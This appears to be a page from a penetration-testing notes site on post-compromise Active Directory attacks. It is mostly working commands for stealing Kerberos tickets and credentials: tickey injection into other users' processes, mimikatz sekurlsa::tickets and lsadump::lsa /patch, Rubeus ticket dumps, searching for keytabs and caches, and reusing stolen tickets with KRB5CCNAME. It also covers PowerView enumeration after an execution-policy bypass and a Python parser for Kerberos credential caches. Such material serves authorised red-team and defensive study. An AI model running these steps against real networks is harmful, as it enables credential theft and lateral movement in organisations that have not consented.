Hacker Mind
Active Directory

This section assumes you already have access to a computer that is joined to the AD domain, i.e. an assumed-breach scenario on that host.

Last updated 7 months ago

Enumerate Juicy Info

Harvest tickets from Linux

Check type and location of tickets:

grep default_ccache_name /etc/krb5.conf

If nothing is returned, the default is FILE:/tmp/krb5cc_%{uid}.

For file-based tickets, you can copy the cache file (if you have permission to read it) and use it directly.

For KEYRING tickets, you can use tickey to extract them:

# Dumps the current user's tickets; if root, try to dump them all by injecting into other users' processes
# To inject, copy tickey to a folder reachable by all users
cp tickey /tmp/tickey
/tmp/tickey -i

Harvest tickets from Windows

With mimikatz:

mimikatz # sekurlsa::tickets /export

With Rubeus in PowerShell:

.\Rubeus dump

# Rubeus dumps the tickets as base64; to write one to a .kirbi file:
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64_ticket>"))

reference:

krb5.keytab

# Linux cached Kerberos tickets and keytabs

find / -type f -iname "krb5.keytab" 2>/dev/null
find / -type f -iname "krb5cc_*" 2>/dev/null

# Windows cached Kerberos tickets and keytabs

dir "\krb5*.keytab" /s
dir "\krb5cc_*" /s

If you find a krb5cc_* file, point the KRB5CCNAME environment variable at it, then check with klist:

export KRB5CCNAME=/tmp/krb5cc_<uid>   # use the actual file path; a glob here is not expanded
klist

# If klist shows a valid ticket, you can authenticate with it instead of a password, e.g.:

python3 GetADUsers.py -all -k -no-pass -dc-ip 172.16.x.y <domain>/<username>
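To see what a harvested krb5cc_* file actually holds (whose ticket it is, for which service, and when it expires) without importing it, here is an added example, not part of the original notes, that parses the MIT version-4 credential-cache format; the sample cache is constructed in code with made-up principals (alice@CORP.LOCAL) and a dummy key and ticket, and only the file layout, not any real ticket, is shown:

```python
import struct
# Added illustration, not the notes' own code: the sample cache built below uses made-up principals and a dummy key/ticket.
def _data(b, p):                       # counted octet string: u32 length + bytes
    n = struct.unpack_from(">I", b, p)[0]
    return b[p + 4:p + 4 + n], p + 4 + n
def _principal(b, p):                  # name_type, num_components, realm, comps
    n = struct.unpack_from(">I", b, p + 4)[0]
    realm, p = _data(b, p + 8)
    comps = []
    for _ in range(n):
        c, p = _data(b, p)
        comps.append(c.decode())
    return "/".join(comps) + "@" + realm.decode(), p

def parse_ccache_v4(b):                # -> (default principal, [credential dicts])
    if b[:2] != b"\x05\x04":
        raise ValueError("not a version-4 MIT ccache")
    p = 4 + struct.unpack_from(">H", b, 2)[0]           # skip the tagged header
    default, p = _principal(b, p)
    creds = []
    while p < len(b):
        client, p = _principal(b, p)
        server, p = _principal(b, p)
        _, p = _data(b, p + 2)                          # u16 enctype + session key
        end = struct.unpack_from(">IIII", b, p)[2]; p += 16    # auth/start/end/renew
        flags = struct.unpack_from(">I", b, p + 1)[0]; p += 5  # u8 is_skey, u32 flags
        for _ in range(2):                              # addresses, then authdata
            cnt = struct.unpack_from(">I", b, p)[0]; p += 4
            for _ in range(cnt):
                _, p = _data(b, p + 2)                  # u16 type + data
        ticket, p = _data(b, p)
        _, p = _data(b, p)                              # second_ticket (unused)
        creds.append({"client": client, "server": server, "end": end, "ticket_len":
                      len(ticket), "forwardable": bool(flags & 0x40000000)})
    return default, creds

def _enc(s): return struct.pack(">I", len(s)) + s     # counted octet string encoder
def _enc_principal(name):              # "user@REALM" or "svc/host@REALM"
    comps, realm = name.rsplit("@", 1)
    parts = [c.encode() for c in comps.split("/")]
    return struct.pack(">II", 1, len(parts)) + _enc(realm.encode()) + b"".join(map(_enc, parts))

def build_sample_ccache(client, server, end):   # constructed v4 cache, one forwardable TGT
    header = struct.pack(">HHH", 12, 1, 8) + b"\x00" * 8          # tag 1 = DeltaTime
    cred = (_enc_principal(client) + _enc_principal(server)
            + struct.pack(">H", 18) + _enc(b"\x00" * 32)           # enctype 18, dummy key
            + struct.pack(">IIII", end - 36000, end - 36000, end, end + 604800)
            + struct.pack(">BI", 0, 0x40000000)                    # is_skey, TKT_FLG_FORWARDABLE
            + struct.pack(">II", 0, 0) + _enc(b"dummy-ticket") + _enc(b""))  # no addrs/authdata
    return b"\x05\x04" + header + _enc_principal(client) + cred
```

Running parse_ccache_v4 over the bytes of a real cache file gives the same summary that klist prints, which is useful for triage when a stray krb5cc_* file turns up in a world-readable location.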

PowerView

Import module

powershell -ep bypass
[PS] . .\PowerView.ps1

The Domain Users

Get-NetUser | select cn

# dump the interesting info
Get-NetUser | select cn,lastlogon,logoncount,memberof

The Domain Groups

Get-NetGroup -GroupName *admin*

The Shared Folder

Invoke-ShareFinder

Note: default administrative shares:

ADMIN$
C$
IPC$
NETLOGON
SYSVOL

Net Computer

Get-NetComputer -FullData
Get-NetComputer -FullData | select operatingsystem

Mimikatz

Note: must be run as administrator.

mimikatz.exe

privilege::debug
lsadump::lsa /patch

Tools and references for extracting tickets:

tickey
Mimikatz
Rubeus
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
https://github.com/sosdave/KeyTabExtract/blob/master/keytabextract.py